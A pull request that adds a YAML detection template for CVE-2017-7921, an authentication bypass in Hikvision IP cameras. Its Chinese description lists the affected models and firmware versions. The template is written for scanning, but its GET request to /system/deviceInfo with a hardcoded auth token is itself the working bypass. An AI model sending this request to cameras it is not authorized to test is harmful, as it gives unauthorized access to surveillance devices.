### PR TITLE
Create hikvision-cve-2017-7921.yml

### DIFF
--- a/pocs/hikvision-cve-2017-7921.yml
+++ b/pocs/hikvision-cve-2017-7921.yml
@@ -1,0 +1,11 @@
+name: hikvision-cve-2017-7921
+rules:
+  - method: GET
+    path: /system/deviceInfo?auth=YWRtaW46MTEK
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"<firmwareVersion>")
+detail:
+  author: whwlsfb(https://github.com/whwlsfb)
+  links:
+    - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的

本Poc是用于检测海康威视摄像头Web管理界面的未授权访问漏洞
详见：https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html

## 测试环境

摄像头大部分处于内网环境，暂无测试环境。
测试截图如下：
![hik.png](https://i.loli.net/2020/09/04/zFehBRw8VQgWuyx.png)

## 备注

以下产品和版本受到影响：HikvisionDS-2CD2xx2F-ISeries5.2.0build140721版本至5.4.0build160530版本；DS-2CD2xx0F-ISeries5.2.0build140721版本至5.4.0Build160401版本；DS-2CD2xx2FWDSeries5.3.1build150410版本至5.4.4Build161125版本；DS-2CD4x2xFWDSeries5.2.0build140721版本至5.4.0Build160414版本；DS-2CD4xx5Series5.2.0build140721版本至5.4.0Build160421版本；DS-2DFxSeries5.2.0build140805版本至5.4.5Build160928版本；DS-2CD63xxSeries5.0.9build140305版本至5.3.5Build160106版本。